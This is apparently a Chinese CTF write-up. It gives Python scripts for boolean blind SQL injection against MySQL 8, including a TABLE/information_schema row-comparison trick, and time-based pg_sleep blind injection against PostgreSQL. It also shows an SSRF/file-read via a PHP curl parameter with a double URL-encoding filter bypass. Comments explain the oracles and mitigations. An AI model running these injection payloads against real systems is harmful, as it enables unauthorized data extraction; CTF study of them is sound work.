ccc 太菜了!!!

web

ezsql

fuzz 一下，发现过滤了：

空格 select union ; if

写脚本进行 bool 盲注：

import requests

# Boolean-based blind extraction through the login form. The only oracle
# is the literal response text 'password error!': it is present exactly
# when the injected CASE expression evaluates to 1. A login endpoint that
# returns one uniform failure message for every bad attempt (and builds its
# query with bound parameters) has no such oracle.
url = 'http://139.129.98.9:30003/login.php'
flag=''
# Every probe is routed through a local intercepting proxy so requests can
# be inspected and replayed.
proxies={
    "http":"127.0.0.1:8080"
}
# One character position per outer iteration; position 1 is the first
# character of the extracted value.
for i in range(1,50):
    f1=flag
    # Binary search over printable ASCII (ord 33..127) for this position.
    top=127
    low=33
    while low<=top:
        mid=(top+low)//2
        # Commented-out payload variants kept from the original.
        # case/**/when/**/ord(substr((password)/**/from/**/{}/**/for/**/1))>{}/**/then/**/1/**/else/**/0/**/end
        # 1'||(0)='1 (case/**/when/**/(ord(substr((password)/**/from/**/{}/**/for/**/1))/**/in/**/({}))/**/then/**/1/**/else/**/0/**/end)
        # data1 is the equality probe (ord(char) in (mid)); data2 is the
        # ordering probe (ord(char) > mid). `/**/` replaces the filtered
        # space character; the value read is the second row of `f11114g`
        # (`limit 1,1`) via MySQL 8's TABLE statement.
        data1 = {"username": "1'||(case/**/when/**/(ord(substr((table/**/`f11114g`/**/limit/**/1,1)/**/from/**/{}/**/for/**/1))/**/in/**/({}))/**/then/**/1/**/else/**/0/**/end)='1".format(str(i),str(mid)), "password": "123"}
        data2 = {"username": "1'||(case/**/when/**/ord(substr((table/**/`f11114g`/**/limit/**/1,1)/**/from/**/{}/**/for/**/1))>{}/**/then/**/1/**/else/**/0/**/end)='1".format(str(i),str(mid)), "password": "123"}
        try:
            print(i,mid)
            r1=requests.post(url, data=data1,proxies=proxies)
            if 'password error!' in r1.text:
                # Exact hit: record the character and stop searching this position.
                flag+=chr(mid)
                print(flag)
                break
            r2=requests.post(url, data=data2,proxies=proxies)
            if 'password error!' in r2.text:
                low=mid+1
            else:
                top=mid-1
        except Exception as e:
            # Transport errors are printed; low/top are untouched, so the
            # same mid is retried on the next pass of the while loop.
            print(e)
    # No character was found at this position: the value has ended.
    if flag==f1:
        break
print(flag)

# 8.0.22-0ubuntu0.20.04.2
# ctf
# gml666 b4bc4c343ed120df3bff56d586e6d617

注出密码登录后发现没有 flag。ccc……MySQL 版本为 8，想到了之前在 p 神星球看到的 trick。

写 exp（这个脚本最后一位要改一下，位置加 1）：

import requests

# Second blind probe using the same 'password error!' oracle. Instead of an
# ord()-based binary search it compares a constructed 21-column row tuple
# against rows of `information_schema`.`tables`, read with MySQL 8's TABLE
# statement and ordered by column 15 (CREATE_TIME) descending, so the row
# at offset `index` is the most recently created table.
url = 'http://139.129.98.9:30003/login.php'
flag=''
proxies={
    "http":"127.0.0.1:8080"
}
# Offset into the ordered table list; 0 = newest table.
index=0
# Candidate alphabet. The method assumes `s` is ordered the same way the
# server's collation compares these strings.
s='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
for i in range(1,50):
    f1=flag
    for j in s:
        # Tuple ('def', 'ctf', prefix+j, NULL x 18) < target row. The first
        # two columns are fixed (presumably catalog and schema); the
        # comparison stays true while prefix+j still sorts before the
        # real table name.
        data = {"username": "1'||(case/**/when(('def','ctf','{}',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null)<(table/**/`information_schema`.`tables`/**/order/**/by/**/15/**/desc/**/limit/**/{},1))/**/then/**/1/**/else/**/0/**/end)='1".format(flag+j,str(index)), "password": "123"}
        try:
            print(i,j)
            r1=requests.post(url, data=data,proxies=proxies)
            if 'password error!' not in r1.text:
                # First candidate that no longer sorts before the target:
                # the previous alphabet entry is taken as the character.
                # Caveat: if this happens at j == '0', s.index(j)-1 is -1
                # and the last alphabet character ('z') is appended instead.
                flag+=s[s.index(j)-1]
                print(flag)
                break
        except Exception as e:
            # Errors are printed and that candidate is simply skipped.
            print(e)
    # Nothing appended for this position: the name has ended.
    if flag==f1:
        break
print(flag)
# `information_schema`.`tables` has 21 columns; column 15 is CREATE_TIME (creation time), so ordering by it puts the tables created for the challenge first.

你能登陆成功吗

exp:

import requests
import string
# Time-based blind probe against a second service (port 30005, JSON login
# body). The backend is PostgreSQL (pg_sleep / overlay ... placing ... from):
# the injected CASE sleeps 3 s when `password` equals itself with one
# character overwritten, i.e. when the guessed character at `index` is
# already right. The client's timeout=2 turns that delay into a requests
# exception, which is the only signal used. Uniform-latency error handling
# and bound parameters remove this timing side channel.
burp0_url = "http://139.129.98.9:30005/"
burp0_cookies = {"sidebarStatus": "1"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://139.129.98.9:30005", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4343.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://139.129.98.9:30005/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

dic = string.ascii_letters + string.digits
flag = ''
# The outer loop always runs all 50 positions; there is no early stop when
# the value ends.
for index in range(50):
    print(index)
    for i in dic:
        # overlay(password placing '<i>' from <index>) rewrites one character;
        # the equality holds only when that character was already <i>.
        burp0_json={"password": "a'||case/**/when/**/password=overlay(password/**/placing/**/'{}'/**/from/**/{})/**/then/**/pg_sleep(3)/**/else/**/pg_sleep(0)/**/end--".format(i, index), "username": "admin"}
        try:
            requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json, timeout=2)
        except Exception as e:
            # Any exception counts as a hit: the intended timeout from
            # pg_sleep(3), but also connection errors, so an unstable network
            # produces wrong characters. A reply within 2 s is a miss.
            flag += i
            print(flag)
            break

misc

签到

查看源码发现：`/?url=`

image-20201205231950119

读源码:

?url=file:///var/www/html/index.php
<?php
// Leaks the hint that the page accepts a `url` query parameter.
echo "<!-- /?url= -->";
if ($_GET['url']) {
    // The sole input control: a case-insensitive denylist on the substring
    // "flag", applied to the parameter value as PHP delivers it and before
    // curl itself interprets (and decodes) the URL. Nothing restricts the
    // scheme or destination host, so curl can be pointed at file:// paths
    // and internal addresses. A substring denylist is not an SSRF/LFI
    // mitigation; the safe shape is an allowlist of schemes and hosts,
    // checked after the URL has been parsed and normalised.
    if (preg_match("/flag/i", $_GET['url'])) {
        die();
    }
    $curl = curl_init();

    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_TIMEOUT, 500);
    curl_setopt($curl, CURLOPT_URL, $_GET['url']);

    // The fetched body is echoed back to the client verbatim.
    $res = curl_exec($curl);
    curl_close($curl);
    echo $res;
}

二次 URL 编码绕过：

?url=file:///fla%25%36%37
